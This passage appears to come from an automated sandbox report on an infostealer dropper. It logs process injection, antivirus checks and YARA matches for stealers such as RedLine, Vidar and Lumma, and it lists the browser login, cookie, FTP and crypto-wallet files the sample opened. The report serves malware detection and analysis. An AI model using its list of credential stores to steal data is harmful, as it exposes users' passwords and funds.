                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess created: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe "C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe"Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess created: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe "C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe"Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6948 -ip 6948
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6948 -s 876
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2796 -ip 2796
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1708 -ip 1708
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 548
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 944
                        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: unknown unknown
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0053EE6E cpuid 3_2_0053EE6E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,3_2_005610C7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,3_2_005612CC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,3_2_00561373
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,3_2_005613BE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,3_2_00561459
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_005614E4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,3_2_0055B578
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoEx,FormatMessageA,3_2_005406BF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,3_2_00561737
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00561860
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,3_2_00561966
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,3_2_0055BA47
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00561A3C
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeQueries volume information: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeQueries volume information: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeQueries volume information: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeQueries volume information: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeQueries volume information: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeQueries volume information: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeQueries volume information: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exe VolumeInformation
                        Source: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeQueries volume information: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exe VolumeInformation
                        Source: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeQueries volume information: C:\Windows VolumeInformation
                        Source: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeQueries volume information: C:\Windows\AppReadiness VolumeInformation
                        Source: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
                        Source: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                        Source: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                        Source: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeQueries volume information: C:\ProgramData\jewkkwnf\jewkkwnf.exe VolumeInformation
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042C650 GetSystemTimeAsFileTime,3_2_0042C650
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00442070 GetComputerNameA,__aulldiv,GlobalAlloc,LookupAccountNameA,GetLastError,ConvertSidToStringSidA,GetLastError,3_2_00442070
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042DCD0 RtlGetVersion,GetVersionExA,3_2_0042DCD0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: Yt_9y5LuIpBZXKd9EiYluKkG.exe, 00000006.00000002.1826093491.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, g2v2mVtOHdxh9ZgrtYde5yf0.exe, 0000000B.00000002.1893286223.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, wg6F73wLMGz6xXFA14w_olCU.exe, 0000000D.00000002.2166406774.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, 1IvCzYfqoD3SHvKt45m1rbHu.exe, 0000000E.00000002.1944247842.0000000000E31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                        Source: Yt_9y5LuIpBZXKd9EiYluKkG.exe, 00000006.00000002.1826093491.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, g2v2mVtOHdxh9ZgrtYde5yf0.exe, 0000000B.00000002.1893286223.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, wg6F73wLMGz6xXFA14w_olCU.exe, 0000000D.00000002.2166406774.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, 1IvCzYfqoD3SHvKt45m1rbHu.exe, 0000000E.00000002.1944247842.0000000000E31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVP.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
                        Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Amadeys stealer DLL
                        Source: Yara matchFile source: 12.2.kJHbagG0C4H5BEyYJQeInLfF.exe.5ca3f2.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.kJHbagG0C4H5BEyYJQeInLfF.exe.5ca3f2.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.kJHbagG0C4H5BEyYJQeInLfF.exe.2270000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.kJHbagG0C4H5BEyYJQeInLfF.exe.2270000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.kJHbagG0C4H5BEyYJQeInLfF.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.2392167583.0000000002270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2391461087.00000000005CA000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Yara detected Clipboard Hijacker
                        Source: Yara matchFile source: 00000008.00000002.2952837551.0000000001409000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: kFXFCWzZNovbPAcE4V3M4DAO.exe PID: 5828, type: MEMORYSTR
                        Yara detected Cryptbot
                        Source: Yara matchFile source: Process Memory Space: kFXFCWzZNovbPAcE4V3M4DAO.exe PID: 5828, type: MEMORYSTR
                        Yara detected Go Injector
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000012.00000000.1791538975.00007FF75157B000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.2923275259.00007FF75157B000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                        Yara detected LummaC Stealer
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Yara detected PrivateLoader
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6388, type: MEMORYSTR
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 11.2.g2v2mVtOHdxh9ZgrtYde5yf0.exe.3f55570.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.g2v2mVtOHdxh9ZgrtYde5yf0.exe.3f55570.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000021.00000002.1899246450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2116924327.0000000003F55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Yara detected RedLine Stealer
                        Source: Yara matchFile source: 13.2.wg6F73wLMGz6xXFA14w_olCU.exe.3345570.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.wg6F73wLMGz6xXFA14w_olCU.exe.3345570.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000D.00000002.2359247420.0000000003345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: wg6F73wLMGz6xXFA14w_olCU.exe PID: 2796, type: MEMORYSTR
                        Yara detected SmokeLoader
                        Source: Yara matchFile source: 0000002B.00000002.2943867641.0000000002A61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2601636491.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2601573090.0000000002561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                        Yara detected Stealc
                        Source: Yara matchFile source: 0000001B.00000002.2207772758.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Yara detected Vidar
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 6.2.Yt_9y5LuIpBZXKd9EiYluKkG.exe.34c5570.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.2087266509.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Yt_9y5LuIpBZXKd9EiYluKkG.exe PID: 1280, type: MEMORYSTR
                        Yara detected zgRAT
                        Source: Yara matchFile source: 11.2.g2v2mVtOHdxh9ZgrtYde5yf0.exe.3f55570.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.g2v2mVtOHdxh9ZgrtYde5yf0.exe.3f55570.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: kFXFCWzZNovbPAcE4V3M4DAO.exeString found in binary or memory: Electrum
                        Source: kFXFCWzZNovbPAcE4V3M4DAO.exeString found in binary or memory: \ElectronCash\wallets
                        Source: kFXFCWzZNovbPAcE4V3M4DAO.exe, 00000008.00000000.1791830844.0000000000887000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: s\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)CLR_v2.0PlaceholderTileLogoFolderVirtualStoreWindows Photo ViewerjnlgamecbpmbajjfhmmmlhejkemejdmaRealPlayerRealNetworksSYACOneDrive\.pngPower BI DesktopSystemCertificatesVaultemojiBlizzard EntertainmentBattle.netODISpaint.netAmpMeltytech.openshot_qtMusic
                        Source: kFXFCWzZNovbPAcE4V3M4DAO.exeString found in binary or memory: com.liberty.jaxx
                        Source: kFXFCWzZNovbPAcE4V3M4DAO.exeString found in binary or memory: s\Exodus\backup
                        Source: kFXFCWzZNovbPAcE4V3M4DAO.exeString found in binary or memory: Exodus\
                        Source: kFXFCWzZNovbPAcE4V3M4DAO.exeString found in binary or memory: Ethereum (UTC)
                        Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeString found in binary or memory: set_UseMachineKeyStore
                        Tries to harvest and steal Bitcoin Wallet information
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-shm
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-wal
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-wal
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
